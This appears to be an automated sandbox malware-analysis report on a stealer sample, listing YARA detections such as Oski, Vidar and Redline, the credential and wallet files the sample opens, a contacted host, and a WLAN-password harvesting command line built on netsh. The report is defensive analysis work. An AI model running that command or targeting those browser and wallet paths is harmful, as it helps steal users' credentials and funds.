Source: taskshell.exe, 00000007.00000002.562750581.0000000001370000.00000002.00020000.sdmp, chormuim.exe, 00000008.00000000.354943209.0000000000F10000.00000002.00020000.sdmp, chormuim.exe, 00000008.00000000.369857165.0000000000F10000.00000002.00020000.sdmp, taskshell.exe, 0000000C.00000002.562969442.0000000001BD0000.00000002.00020000.sdmp, taskshell.exe, 00000010.00000002.562402848.0000000001010000.00000002.00020000.sdmp Binary or memory string: Program Manager
Source: taskshell.exe, 00000007.00000002.562750581.0000000001370000.00000002.00020000.sdmp, chormuim.exe, 00000008.00000000.354943209.0000000000F10000.00000002.00020000.sdmp, chormuim.exe, 00000008.00000000.369857165.0000000000F10000.00000002.00020000.sdmp, taskshell.exe, 0000000C.00000002.562969442.0000000001BD0000.00000002.00020000.sdmp, taskshell.exe, 00000010.00000002.562402848.0000000001010000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: taskshell.exe, 00000007.00000002.562750581.0000000001370000.00000002.00020000.sdmp, chormuim.exe, 00000008.00000000.354943209.0000000000F10000.00000002.00020000.sdmp, chormuim.exe, 00000008.00000000.369857165.0000000000F10000.00000002.00020000.sdmp, taskshell.exe, 0000000C.00000002.562969442.0000000001BD0000.00000002.00020000.sdmp, taskshell.exe, 00000010.00000002.562402848.0000000001010000.00000002.00020000.sdmp Binary or memory string: Progman
Source: taskshell.exe, 00000007.00000002.562750581.0000000001370000.00000002.00020000.sdmp, chormuim.exe, 00000008.00000000.354943209.0000000000F10000.00000002.00020000.sdmp, chormuim.exe, 00000008.00000000.369857165.0000000000F10000.00000002.00020000.sdmp, taskshell.exe, 0000000C.00000002.562969442.0000000001BD0000.00000002.00020000.sdmp, taskshell.exe, 00000010.00000002.562402848.0000000001010000.00000002.00020000.sdmp Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

barindex
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: GetProcessHeap,HeapAlloc,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,_memset,LocalFree, 4_2_00B8AA60
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Code function: GetLocaleInfoA, 6_2_00417A20
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe Queries volume information: C:\Users\user\Desktop\18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Queries volume information: C:\ProgramData\216363876181815\autofill\Google Chrome_Default.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Queries volume information: C:\ProgramData\216363876181815\cc\Google Chrome_Default.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Queries volume information: C:\ProgramData\216363876181815\cookies\Google Chrome_Default.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Queries volume information: C:\ProgramData\216363876181815\outlook.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Queries volume information: C:\ProgramData\216363876181815\passwords.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Queries volume information: C:\ProgramData\216363876181815\screenshot.jpg VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Queries volume information: C:\ProgramData\216363876181815\system.txt VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\dll.exe Queries volume information: C:\Users\user\AppData\Local\Temp\dll.exe VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuimii.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe Queries volume information: C:\ProgramData\AMD Driver\taskshell.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Queries volume information: C:\Users\user\AppData\Local\Temp\chormuim.exe VolumeInformation Jump to behavior
Source: C:\ProgramData\AMD Driver\taskshell.exe Queries volume information: C:\ProgramData\AMD Driver\taskshell.exe VolumeInformation
Source: C:\ProgramData\AMD Driver\taskshell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\ProgramData\AMD Driver\taskshell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\ProgramData\AMD Driver\taskshell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\ProgramData\AMD Driver\taskshell.exe Queries volume information: C:\ProgramData\AMD Driver\taskshell.exe VolumeInformation
Source: C:\ProgramData\AMD Driver\taskshell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\ProgramData\AMD Driver\taskshell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\ProgramData\AMD Driver\taskshell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\netsh.exe Queries volume information: C:\ VolumeInformation
Queries information about the installed CPU (vendor, model number etc)
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 Jump to behavior
Queries the product ID of Windows
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion DigitalProductId Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B86D00 SetFilePointer,SetFilePointer,GetLocalTime,SystemTimeToFileTime, 4_2_00B86D00
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B7D6E2 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte, 4_2_00B7D6E2
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8B1E0 GetUserNameA, 4_2_00B8B1E0
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe Code function: 4_2_00B8BEE0 _memset,_memset,GetVersionExA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WideCharToMultiByte,_fprintf,_fprintf,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,WideCharToMultiByte,WideCharToMultiByte,_fprintf,_fprintf,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,_fprintf,_fprintf,WideCharToMultiByte,_fprintf,_fprintf,FreeLibrary, 4_2_00B8BEE0

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Uses netsh to modify the Windows network and firewall settings
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
AV process strings found (often used to terminate AV products)
Source: Amcache.hve.29.dr Binary or memory string: c:\users\user\desktop\procexp.exe
Source: Amcache.hve.29.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: chormuim.exe, 00000008.00000002.409485125.000000001BA2C000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.373931616.000000001BA2C000.00000004.00000010.sdmp Binary or memory string: r\MsMpeng.exe
Source: chormuim.exe, 00000008.00000000.373226840.000000001B93C000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.369711383.0000000000861000.00000004.00000020.sdmp, chormuim.exe, 00000008.00000000.365261466.000000001B93C000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.362756816.000000001B900000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000002.409186755.000000001B900000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.366204607.000000001BA2C000.00000004.00000010.sdmp, chormuim.exe, 00000008.00000000.372980265.000000001B900000.00000004.00000010.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: Amcache.hve.29.dr Binary or memory string: procexp.exe

Stealing of Sensitive Information:

barindex
Yara detected Redline Clipper
Source: Yara match File source: 12.0.taskshell.exe.d90000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.2.taskshell.exe.d90000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.dll.exe.23a3290.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.0.taskshell.exe.310000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.taskshell.exe.640000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 16.2.taskshell.exe.310000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.taskshell.exe.640000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000010.00000000.348480456.0000000000312000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.555072443.0000000000D92000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.555066111.0000000000642000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000000.330943519.0000000000D92000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.302503110.0000000000642000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.304102093.0000000002341000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.555084428.0000000000312000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: dll.exe PID: 5360, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: taskshell.exe PID: 6056, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: taskshell.exe PID: 3132, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: taskshell.exe PID: 6772, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\AMD Driver\taskshell.exe, type: DROPPED
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: chormuim.exe PID: 6504, type: MEMORYSTR
Yara detected Oski Stealer
Source: Yara match File source: 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: svchoste.exe PID: 4648, type: MEMORYSTR
Source: Yara match File source: 6.2.chormuimii.exe.4b05400.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4af0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.svchoste.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.36b5530.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4ba0f62.13.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4c0fb62.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.36b5530.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4af0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.12cb1698.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.2406b90.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4b5ec00.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.36b6492.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4b5ec00.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.23ad390.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.36b6492.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.12cb1698.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.2406b90.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4ba0000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.2397f90.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4bb6362.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4ba0f62.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.svchoste.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.2397f90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4c0fb62.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4ba0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.12bfa128.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.36cb892.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.310578337.00000000036B5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.301530705.0000000012BE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.311291755.0000000004BA0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.310945745.0000000004AF0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.310112322.0000000002397000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\svchoste.exe, type: DROPPED
Yara detected StormKitty Stealer
Source: Yara match File source: 00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: chormuim.exe PID: 6504, type: MEMORYSTR
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: svchoste.exe PID: 4648, type: MEMORYSTR
Yara detected AveMaria stealer
Source: Yara match File source: 00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: chormuim.exe PID: 6504, type: MEMORYSTR
Tries to steal Mail credentials (via file / registry access)
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Found many strings related to Crypto-Wallets (likely being stolen)
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp String found in binary or memory: \\Electrum-LTC\\wallets\\
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp String found in binary or memory: \\ElectronCash\\wallets\\
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp String found in binary or memory: window-state.json
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp String found in binary or memory: \\jaxx\\
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp String found in binary or memory: exodus.conf.json
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp String found in binary or memory: \\Exodus\\exodus.wallet\\
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp String found in binary or memory: info.seco
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp String found in binary or memory: passphrase.json
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp String found in binary or memory: \\Ethereum\\
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp String found in binary or memory: \\Exodus\\exodus.wallet\\
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp String found in binary or memory: \\Ethereum\\
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp String found in binary or memory: default_wallet
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp String found in binary or memory: multidoge.wallet
Source: svchoste.exe, 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp String found in binary or memory: seed.seco
Source: 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe String found in binary or memory: set_UseMachineKeyStore
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Tries to steal Crypto Currency Wallets
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Roaming\ElectronCash\wallets\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\ Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\svchoste.exe File opened: C:\Users\user\AppData\Roaming\MultiDoge\ Jump to behavior
Tries to harvest and steal WLAN passwords
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Source: C:\Users\user\AppData\Local\Temp\chormuim.exe Process created: C:\Windows\System32\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All Jump to behavior
Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profile
Yara detected Credential Stealer
Source: Yara match File source: 00000008.00000000.370467159.00000000027FF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.406666147.00000000027FF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.356149280.00000000027FF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: svchoste.exe PID: 4648, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: chormuim.exe PID: 6504, type: MEMORYSTR

Remote Access Functionality:

barindex
Yara detected Telegram RAT
Source: Yara match File source: Process Memory Space: chormuim.exe PID: 6504, type: MEMORYSTR
Yara detected Oski Stealer
Source: Yara match File source: 00000004.00000002.330615295.0000000002D05000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: svchoste.exe PID: 4648, type: MEMORYSTR
Source: Yara match File source: 6.2.chormuimii.exe.4b05400.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4af0000.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.0.svchoste.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.36b5530.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4ba0f62.13.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4c0fb62.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.36b5530.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4af0000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.12cb1698.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.2406b90.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4b5ec00.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.36b6492.5.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4b5ec00.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.23ad390.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.36b6492.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.12cb1698.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.2406b90.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4ba0000.14.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.2397f90.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4bb6362.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4ba0f62.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.svchoste.exe.b70000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.2397f90.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4c0fb62.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.4ba0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe.12bfa128.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.chormuimii.exe.36cb892.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000006.00000002.310578337.00000000036B5000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.301530705.0000000012BE1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.311291755.0000000004BA0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.310945745.0000000004AF0000.00000004.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.310112322.0000000002397000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\svchoste.exe, type: DROPPED
Yara detected StormKitty Stealer
Source: Yara match File source: 00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: chormuim.exe PID: 6504, type: MEMORYSTR
Yara detected Vidar stealer
Source: Yara match File source: Process Memory Space: svchoste.exe PID: 4648, type: MEMORYSTR
Yara detected AveMaria stealer
Source: Yara match File source: 00000008.00000000.370201907.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.355408259.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.406228414.0000000002691000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: chormuim.exe PID: 6504, type: MEMORYSTR
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 553216 Sample: 18719D6856A09A622001F1C3250... Startdate: 14/01/2022 Architecture: WINDOWS Score: 100 96 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->96 98 Found malware configuration 2->98 100 Antivirus detection for URL or domain 2->100 102 22 other signatures 2->102 9 18719D6856A09A622001F1C325067D56AFA63BD21FBAD.exe 5 2->9         started        13 taskshell.exe 2->13         started        15 taskshell.exe 2->15         started        17 msiexec.exe 2->17         started        process3 file4 76 C:\Users\user\AppData\Local\...\svchoste.exe, PE32 9->76 dropped 78 C:\Users\user\AppData\Local\Temp\dll.exe, PE32 9->78 dropped 80 C:\Users\user\AppData\...\chormuimii.exe, PE32 9->80 dropped 82 18719D6856A09A6220...A63BD21FBAD.exe.log, ASCII 9->82 dropped 116 Hides that the sample has been downloaded from the Internet (zone.identifier) 9->116 19 chormuimii.exe 3 9->19         started        23 dll.exe 1 3 9->23         started        25 svchoste.exe 196 9->25         started        signatures5 process6 dnsIp7 64 C:\Users\user\AppData\Local\...\chormuim.exe, PE32 19->64 dropped 104 Antivirus detection for dropped file 19->104 106 Machine Learning detection for dropped file 19->106 108 Hides that the sample has been downloaded from the Internet (zone.identifier) 19->108 28 chormuim.exe 14 41 19->28         started        66 C:\ProgramData\AMD Driver\taskshell.exe, PE32 23->66 dropped 33 taskshell.exe 2 23->33         started        88 pplonline.org 108.167.165.140, 49743, 80 UNIFIEDLAYER-AS-1US United States 25->88 68 C:\ProgramData\vcruntime140.dll, PE32 25->68 dropped 70 C:\ProgramData\sqlite3.dll, PE32 25->70 dropped 72 C:\ProgramData\softokn3.dll, PE32 25->72 dropped 74 4 other files (none is malicious) 25->74 dropped 110 Tries to steal Crypto Currency Wallets 25->110 35 cmd.exe 25->35         started        file8 signatures9 process10 dnsIp11 90 ip-api.com 208.95.112.1, 49744, 49751, 80 